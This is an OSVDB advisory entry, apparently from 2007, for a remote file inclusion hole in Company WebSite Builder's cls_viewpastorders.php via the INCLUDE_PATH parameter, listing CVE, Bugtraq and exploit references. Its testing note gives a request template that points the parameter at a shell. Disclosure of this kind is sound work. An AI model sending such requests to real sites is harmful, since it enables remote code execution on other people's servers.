Company WebSite Builder (CWB) include/cls_viewpastorders.php INCLUDE_PATH Variable Remote File Inclusion

2007-04-01T18:28:03
ID OSVDB:35228
Type osvdb
Reporter OSVDB
Modified 2007-04-01T18:28:03

Description

Manual Testing Notes

/[Path]/include/cls_viewpastorders.php?INCLUDE_PATH=Shell

References:

Related OSVDB ID: 35227 Related OSVDB ID: 1011593 Mail List Post: http://www.attrition.org/pipermail/vim/2007-April/001482.html ISS X-Force ID: 33351 Generic Exploit URL: http://www.milw0rm.com/exploits/3628 CVE-2007-1809 Bugtraq ID: 23242